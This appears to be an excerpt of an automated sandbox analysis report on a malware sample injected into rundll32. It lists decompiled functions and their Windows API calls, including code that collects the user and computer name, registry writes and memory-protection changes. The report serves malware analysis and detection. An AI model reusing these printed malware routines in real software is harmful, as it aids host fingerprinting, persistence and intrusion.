                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                          • String ID:
                          • API String ID: 3850880919-0
                          • Opcode ID: 71e8e2d6703081cd322a2e896110d17f4a14d29290eecee02757c7c46c980cce
                          • Instruction ID: 2fe631043caaefafc6b695a562efdfebb3c521000695a77165e37812ed962f8c
                          • Opcode Fuzzy Hash: 71e8e2d6703081cd322a2e896110d17f4a14d29290eecee02757c7c46c980cce
                          • Instruction Fuzzy Hash: 7C21D776900208FFDB11DFE8C989CEEBBBDEF44240B5144AAF512E7240EA30AB44DB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01002A11 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E01002A11() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_t11 = _t43 + 2; // 0x75bcc742
						_v12 = _v12 + _t11;
						_t64 = E01006D63(_v12 + _t11 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E01006C2C(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x10057e9
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                          0x01002a1f
                          0x01002a22
                          0x01002a25
                          0x01002a2b
                          0x01002a30
                          0x01002a36
                          0x01002a3e
                          0x01002a41
                          0x01002a47
                          0x01002a4c
                          0x01002a55
                          0x01002a59
                          0x01002a66
                          0x01002a6a
                          0x01002a6c
                          0x01002a70
                          0x01002a73
                          0x01002a83
                          0x01002ad6
                          0x01002ad7
                          0x01002a85
                          0x01002a8a
                          0x01002a8b
                          0x01002a90
                          0x01002a93
                          0x01002aa6
                          0x00000000
                          0x01002aa8
                          0x01002aab
                          0x01002ab0
                          0x01002abe
                          0x01002ac1
                          0x01002ac7
                          0x01002acc
                          0x00000000
                          0x01002ace
                          0x01002ace
                          0x01002ad1
                          0x01002ad1
                          0x01002acc
                          0x01002aa6
                          0x01002adc
                          0x01002add
                          0x01002a4c
                          0x01002ae3

                          APIs
                          • GetUserNameW.ADVAPI32(00000000,010057E7), ref: 01002A25
                          • GetComputerNameW.KERNEL32(00000000,010057E7), ref: 01002A41
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • GetUserNameW.ADVAPI32(00000000,010057E7), ref: 01002A7B
                          • GetComputerNameW.KERNEL32(010057E7,75BCC740), ref: 01002A9E
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,010057E7,00000000,010057E9,00000000,00000000,?,75BCC740,010057E7), ref: 01002AC1
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                          • String ID:
                          • API String ID: 3850880919-0
                          • Opcode ID: 7351eba421ca07c9f2baaa5fa78a8bf5492d916a6b5bb58dd275c5f072a21049
                          • Instruction ID: 81166a58c779a7f47ec8dafbaf3f95e5762f08f926ee7bb0987e9cd62b89fc2c
                          • Opcode Fuzzy Hash: 7351eba421ca07c9f2baaa5fa78a8bf5492d916a6b5bb58dd275c5f072a21049
                          • Instruction Fuzzy Hash: 7921FF75900208FFEB21DFE8D9848EEBBBCFF54200F1044AAE542E7140DA349B44CB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6306D Relevance: 7.6, APIs: 5, Instructions: 81filememoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B7509E
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750B7
                            • Part of subcall function 05B7508C: GetCurrentThreadId.KERNEL32 ref: 05B750C4
                            • Part of subcall function 05B7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750D0
                            • Part of subcall function 05B7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750DE
                            • Part of subcall function 05B7508C: lstrcpy.KERNEL32(00000000), ref: 05B75100
                          • DeleteFileA.KERNEL32(00000000,000004D2), ref: 05B63090
                          • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 05B63099
                          • GetLastError.KERNEL32 ref: 05B630A3
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B63162
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                          • String ID:
                          • API String ID: 3543646443-0
                          • Opcode ID: af79d2601b0eb9f97aafcd6a7992585827e97e69c6ff2d9ab2ed8db5c8f343c1
                          • Instruction ID: 275a2962e0bb1802a469a8a885592d3c3aec6bf1968e972f489b4057b5a8b10a
                          • Opcode Fuzzy Hash: af79d2601b0eb9f97aafcd6a7992585827e97e69c6ff2d9ab2ed8db5c8f343c1
                          • Instruction Fuzzy Hash: 5E2141B2611218BBCB10B7E4EC4DEA63FADAF4A250B151052B715DB241DA38F905CFF9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B72F4E Relevance: 7.6, APIs: 5, Instructions: 75fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B71C19: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,05B6E231,00000000,76CDF5B0,05B70348,?,00000001), ref: 05B71C25
                            • Part of subcall function 05B71C19: _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 05B71C3B
                            • Part of subcall function 05B71C19: _snwprintf.NTDLL ref: 05B71C60
                            • Part of subcall function 05B71C19: CreateFileMappingW.KERNEL32(000000FF,05B8A1E8,00000004,00000000,00001000,?), ref: 05B71C7C
                            • Part of subcall function 05B71C19: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 05B71C8E
                            • Part of subcall function 05B71C19: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 05B71CC6
                          • UnmapViewOfFile.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,05B6E231,00000000,76CDF5B0,05B70348,?,00000001), ref: 05B72F89
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B72F92
                          • SetEvent.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,05B6E231,00000000,76CDF5B0,05B70348,?,00000001), ref: 05B72FD9
                          • GetLastError.KERNEL32(05B73959,00000000,00000000,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B73008
                          • CloseHandle.KERNEL32(00000000,05B73959,00000000,00000000,?,?,?,?,?,?,?,05B69100,?), ref: 05B73018
                            • Part of subcall function 05B6C2AA: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,05B6171E,?,?,00000000,?), ref: 05B6C2B6
                            • Part of subcall function 05B6C2AA: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,05B6171E,?,?,00000000,?), ref: 05B6C2DE
                            • Part of subcall function 05B6C2AA: memset.NTDLL ref: 05B6C2F0
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                          • String ID:
                          • API String ID: 1106445334-0
                          • Opcode ID: 865d97f6202a4608f005d639b29f2cea1ce188ec6d4434ff8a562d55eb8aa49f
                          • Instruction ID: 42a0187439704e7b8ed02722e37f71be0beda031e1484bfb040d4349955f2aa1
                          • Opcode Fuzzy Hash: 865d97f6202a4608f005d639b29f2cea1ce188ec6d4434ff8a562d55eb8aa49f
                          • Instruction Fuzzy Hash: E9218431614709ABDB11ABB4DC49B7A7BEAFF00620B1414A5F962D7190EF30F942EB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7A651 Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,76C86920,00000000,?,?,?,05B6148A,?,?,?), ref: 05B7A66F
                          • GetFileSize.KERNEL32(00000000,00000000,?,?,05B6148A,?,?,?), ref: 05B7A67F
                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,05B6148A,?,?,?), ref: 05B7A6AB
                          • GetLastError.KERNEL32(?,?,05B6148A,?,?,?), ref: 05B7A6D0
                          • CloseHandle.KERNEL32(000000FF,?,?,05B6148A,?,?,?), ref: 05B7A6E1
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateErrorHandleLastReadSize
                          • String ID:
                          • API String ID: 3577853679-0
                          • Opcode ID: c2344705435e8f161b046ab928dc6d42d9a3a0be8279d0b6939e2c015e5208a7
                          • Instruction ID: bc1db07f48fd5bb69bcbf24dc72ed2411db53f1938f616e27af5c8f8151e9a18
                          • Opcode Fuzzy Hash: c2344705435e8f161b046ab928dc6d42d9a3a0be8279d0b6939e2c015e5208a7
                          • Instruction Fuzzy Hash: 1911B47210421CBFDB206F64CC88ABE7B6EFB446A0F1145A5F926A7180D670FD40A7A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B675D8 Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON
                          Download Yara Rule
                          APIs
                          • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,6E2AA0A7,6E2AA0A7,?,05B787C2,?,?,?,00000000,00000001,00000000,?), ref: 05B675E9
                          • StrRChrA.SHLWAPI(?,00000000,0000002F,?,00000000,6E2AA0A7,6E2AA0A7,?,05B787C2,?,?,?,00000000,00000001,00000000,?), ref: 05B67602
                          • StrTrimA.SHLWAPI(?,?,?,00000000,6E2AA0A7,6E2AA0A7,?,05B787C2,?,?,?,00000000,00000001,00000000,?,00000000), ref: 05B6762A
                          • StrTrimA.SHLWAPI(00000000,?,?,00000000,6E2AA0A7,6E2AA0A7,?,05B787C2,?,?,?,00000000,00000001,00000000,?,00000000), ref: 05B67639
                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000000,00000000,?,00000000,6E2AA0A7,6E2AA0A7,?,05B787C2,?,?,?), ref: 05B67670
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Trim$FreeHeap
                          • String ID:
                          • API String ID: 2132463267-0
                          • Opcode ID: 653d34edc853fbf27066bf49f8fad65d42f4179897603693b1890c79a6730468
                          • Instruction ID: 21903540183113f4693d4e5f09544b263e01ffcc96906d8335aac60afdd284f4
                          • Opcode Fuzzy Hash: 653d34edc853fbf27066bf49f8fad65d42f4179897603693b1890c79a6730468
                          • Instruction Fuzzy Hash: E8118672200205BBDB119A5DDC85FBB7FADEB44694F111061BA09D7241EF74F801CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7389D Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualProtect.KERNEL32(00000000,00000004,00000040,?,0042D5A8,?,?,00000000,00000000,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C), ref: 05B738D4
                          • VirtualProtect.KERNEL32(00000000,00000004,?,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B73904
                          • RtlEnterCriticalSection.NTDLL(05B8A400), ref: 05B73913
                          • RtlLeaveCriticalSection.NTDLL(05B8A400), ref: 05B73931
                          • GetLastError.KERNEL32(?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B73941
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                          • String ID:
                          • API String ID: 653387826-0
                          • Opcode ID: 15abe869dae47e15e0feaf4b77cb9d7cad992d75294b229631b25eac0023fdde
                          • Instruction ID: f67d0e2a108c043d3b1fdfaf12810dd8682a7d5e83c1f35859e9a0de5a4bf6c0
                          • Opcode Fuzzy Hash: 15abe869dae47e15e0feaf4b77cb9d7cad992d75294b229631b25eac0023fdde
                          • Instruction Fuzzy Hash: 492109B5610706EFC720DFA8C985A6ABBF8FF08310710856AEA66D3740D770F944DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B77408 Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 05B77436
                          • GetLastError.KERNEL32 ref: 05B77459
                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 05B7746C
                          • GetLastError.KERNEL32 ref: 05B77477
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B774BF
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                          • String ID:
                          • API String ID: 1671499436-0
                          • Opcode ID: cc1a77a051c180dffdae93e63196764500325c7ee9175904fc28957639be568e
                          • Instruction ID: 27ba0c9b62bde6c90c05ad24fea7f725c93f0957cd75ce0ae9304cf3f0eee808
                          • Opcode Fuzzy Hash: cc1a77a051c180dffdae93e63196764500325c7ee9175904fc28957639be568e
                          • Instruction Fuzzy Hash: CF216D70500248BBEF218B51D98EF6E7FBAFF40328F601498F562A65E0DB75B984DB11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B73775 Relevance: 7.6, APIs: 5, Instructions: 67memoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • InterlockedIncrement.KERNEL32(05B8A06C), ref: 05B73785
                          • HeapFree.KERNEL32(00000000,?,00000000,?,?,00000001,00000191), ref: 05B737DC
                          • InterlockedDecrement.KERNEL32(05B8A06C), ref: 05B737F1
                          • DeleteFileA.KERNEL32(00000000), ref: 05B7380F
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B7381D
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B7509E
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750B7
                            • Part of subcall function 05B7508C: GetCurrentThreadId.KERNEL32 ref: 05B750C4
                            • Part of subcall function 05B7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750D0
                            • Part of subcall function 05B7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750DE
                            • Part of subcall function 05B7508C: lstrcpy.KERNEL32(00000000), ref: 05B75100
                            • Part of subcall function 05B6A316: CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 05B6A391
                            • Part of subcall function 05B6A316: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 05B6A3BD
                            • Part of subcall function 05B6A316: _allmul.NTDLL(?,?,FFFFD8F0,000000FF), ref: 05B6A3CD
                            • Part of subcall function 05B6A316: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,FFFFD8F0,000000FF), ref: 05B6A405
                            • Part of subcall function 05B6A316: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,FFFFD8F0,000000FF), ref: 05B6A427
                            • Part of subcall function 05B6A316: GetShellWindow.USER32 ref: 05B6A436
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileTempTimerWaitable$FreeHeapInterlockedPathTime$CreateCurrentDecrementDeleteIncrementMultipleNameObjectsShellSystemThreadWaitWindow_allmullstrcpy
                          • String ID:
                          • API String ID: 1587453479-0
                          • Opcode ID: 17e75dff65de0ad1a69a1972dab94f9cbf1da926c96e12e6198c8e4bcfa25110
                          • Instruction ID: 53866abf652054a40784ea539db11fd0b0cfc153a82336c2066e8fda1cbf89ce
                          • Opcode Fuzzy Hash: 17e75dff65de0ad1a69a1972dab94f9cbf1da926c96e12e6198c8e4bcfa25110
                          • Instruction Fuzzy Hash: 3A118E7560020CBFDB119FA0CC85EBE3FBEFB44291F1044A5FA05AA140DB75A980ABA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B626D3 Relevance: 7.6, APIs: 5, Instructions: 65registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 05B626E7
                          • memcpy.NTDLL(00000000,?,?,?), ref: 05B62710
                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 05B62739
                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,00000000), ref: 05B62759
                          • RegCloseKey.ADVAPI32(?), ref: 05B62764
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Value$AllocateCloseCreateHeapmemcpy
                          • String ID:
                          • API String ID: 2954810647-0
                          • Opcode ID: faa332beba1ee5dcb47feec19cae87e198c61cf8bbb58387006f20f4423f1bdd
                          • Instruction ID: d5de5e38c336afc37887cf2127d387b653d785dbb82d222927398de24a90d42e
                          • Opcode Fuzzy Hash: faa332beba1ee5dcb47feec19cae87e198c61cf8bbb58387006f20f4423f1bdd
                          • Instruction Fuzzy Hash: AF118A36200109BFEF116E64ED89EBEBB6EFF44691F044061FD11A2190DA75AD10D762
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6E57D Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(05B6980C,?,?,?,?,00000008,05B6980C,00000000,?), ref: 05B6E59A
                          • memcpy.NTDLL(05B6980C,?,00000009,?,?,?,?,00000008,05B6980C,00000000,?), ref: 05B6E5BC
                          • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 05B6E5D4
                          • lstrlenW.KERNEL32(00000000,00000001,05B6980C,?,?,?,?,?,?,?,00000008,05B6980C,00000000,?), ref: 05B6E5F4
                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00000008,05B6980C,00000000,?), ref: 05B6E619
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                          • String ID:
                          • API String ID: 3065863707-0
                          • Opcode ID: e3c95c8c4e07d72be61536a623ddba8eab35995de3df617a4adee00da1541125
                          • Instruction ID: d0f09817729ad5f8d5cbf3d4d8d1f36c830e5b58f547adc12da453954c3b41c7
                          • Opcode Fuzzy Hash: e3c95c8c4e07d72be61536a623ddba8eab35995de3df617a4adee00da1541125
                          • Instruction Fuzzy Hash: 16118639E11208BBCB219BA4D809FEE7FBDEB08710F004051FA19E7280DA74F648DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7FE94 Relevance: 7.6, APIs: 5, Instructions: 61stringtimeCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcmpi.KERNEL32(00000000,?), ref: 05B7FEC3
                          • RtlEnterCriticalSection.NTDLL(05B8A428), ref: 05B7FED0
                          • RtlLeaveCriticalSection.NTDLL(05B8A428), ref: 05B7FEE3
                          • lstrcmpi.KERNEL32(05B8A440,00000000), ref: 05B7FF03
                          • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05B6404D,00000000), ref: 05B7FF17
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                          • String ID:
                          • API String ID: 1266740956-0
                          • Opcode ID: deef6e734c80205a6be273351b140403b8a263f75ba4f41870a905b7527d4e4e
                          • Instruction ID: 2bafab562caec1f1e0c49df897dcd0c79ee0e40f48d9360ed76660513b4c9818
                          • Opcode Fuzzy Hash: deef6e734c80205a6be273351b140403b8a263f75ba4f41870a905b7527d4e4e
                          • Instruction Fuzzy Hash: A4118132915209EFCB14DB58D899ABABBF9FF45334B185096F425D7280DB38BD01CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B63263 Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,00000000,05B83716,00000000,05B72466,?,?,?,05B78A07,?,?,?,00000000,00000001,00000000,?), ref: 05B6326D
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • lstrcpy.KERNEL32(00000000,?), ref: 05B63291
                          • StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,05B78A07,?,?,?,00000000,00000001,00000000,?,00000000), ref: 05B63298
                          • lstrcpy.KERNEL32(00000000,?), ref: 05B632E0
                          • lstrcat.KERNEL32(00000000,?), ref: 05B632EF
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                          • String ID:
                          • API String ID: 2616531654-0
                          • Opcode ID: 78888fb7d98c6401445a8d4780b62d993ecd59dae48e35eba8fc707e3fb9c61b
                          • Instruction ID: f9402725609369c834386bfb7535332a2a4920ba743eb9f8a3a217d9fad58873
                          • Opcode Fuzzy Hash: 78888fb7d98c6401445a8d4780b62d993ecd59dae48e35eba8fc707e3fb9c61b
                          • Instruction Fuzzy Hash: CA11A376200206ABC720DAA5DC8AE7B7BEDFB85210F054469F605D3140EF39F449C761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7E3CD Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B7D580: lstrlen.KERNEL32(00000000,00000000,?,00000000,05B6243E,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 05B7D58C
                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 05B7E3F6
                          • memcpy.NTDLL(00000000,?,?), ref: 05B7E409
                          • RtlEnterCriticalSection.NTDLL(05B8A428), ref: 05B7E41A
                          • RtlLeaveCriticalSection.NTDLL(05B8A428), ref: 05B7E42F
                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 05B7E467
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                          • String ID:
                          • API String ID: 2349942465-0
                          • Opcode ID: 3e61cea204b04d389bc669a9c41d15fd6716016433b2dc5d133a388b3b5e7edc
                          • Instruction ID: e5f4b13defd6ec5cffbcd4fe007311f100bb4447c528f42f5768e902d96447c7
                          • Opcode Fuzzy Hash: 3e61cea204b04d389bc669a9c41d15fd6716016433b2dc5d133a388b3b5e7edc
                          • Instruction Fuzzy Hash: 8511CE32215214AFC7206F28EC49C3B7BAEEF8533570551AAF92693240CA25BC04DBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B74D17 Relevance: 7.6, APIs: 5, Instructions: 57memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(05B6C1F8,00000000,00000000,00000000,?,05B70FD9,?,05B6C1F8,00000000), ref: 05B74D2D
                          • lstrlen.KERNEL32(?,?,05B70FD9,?,05B6C1F8,00000000), ref: 05B74D34
                          • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 05B74D42
                            • Part of subcall function 05B6EEF2: GetLocalTime.KERNEL32(?,?,?,?,05B7FC9E,00000000,00000001), ref: 05B6EEFC
                            • Part of subcall function 05B6EEF2: wsprintfA.USER32 ref: 05B6EF2F
                          • wsprintfA.USER32 ref: 05B74D64
                            • Part of subcall function 05B6ED48: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,05B74D8C,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 05B6ED66
                            • Part of subcall function 05B6ED48: wsprintfA.USER32 ref: 05B6ED8B
                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 05B74D95
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                          • String ID:
                          • API String ID: 3847261958-0
                          • Opcode ID: 401e07799e19abe30d6d21427eaae3e9abc6fbea318d654b4f907084fba2a12c
                          • Instruction ID: 73fe99fe7e507ae16eb9f489a858f166ebfe6513b515899107ffeb0bbdb8a4ec
